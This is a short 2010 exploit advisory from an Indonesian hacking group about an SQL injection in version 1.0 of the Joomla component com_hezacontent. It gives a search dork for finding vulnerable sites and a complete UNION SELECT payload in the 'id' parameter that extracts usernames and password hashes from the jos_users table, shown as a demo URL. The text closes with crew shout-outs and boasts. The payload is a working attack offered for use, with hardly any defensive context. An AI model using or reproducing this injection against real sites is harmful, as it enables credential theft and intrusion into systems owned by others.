53 lines
No EOL
1.7 KiB
Text
53 lines
No EOL
1.7 KiB
Text
[!]===========================================================================[!]
|
|
|
|
[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
|
|
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
|
|
[~] Homepage : http://www.indonesiancoder.com
|
|
[~] Date : 9 march, 2010
|
|
|
|
[!]===========================================================================[!]
|
|
|
|
[ Software Information ]
|
|
|
|
[+] Vendor : http://joomlacode.org/
|
|
[+] Price : free
|
|
[+] Vulnerability : SQL
|
|
[+] Dork : inurl:"CIHUY" ;)
|
|
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
|
|
[+] Version : 1.0
|
|
|
|
[!]===========================================================================[!]
|
|
|
|
[ Vulnerable File ]
|
|
|
|
http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]
|
|
|
|
[ XpL ]
|
|
|
|
-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
|
|
|
|
[ d3m0 ]
|
|
|
|
http://site.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
|
|
|
|
dan lain sebagainya ;]
|
|
|
|
[!]===========================================================================[!]
|
|
|
|
[ Thx TO ]
|
|
|
|
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
|
|
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
|
|
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
|
|
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
|
|
[+] #becak - #indonesiancoder - #kill-9
|
|
[ NOTE ]
|
|
|
|
[+] Rawk !
|
|
[+] gonzhack : buruan kesini dodolllllllllllllllllll !!
|
|
|
|
[ QUOTE ]
|
|
|
|
[+] we are not dead INDONESIANCODER stil r0x
|
|
[+] nothing secure ..
|
|
[+] ./e0f |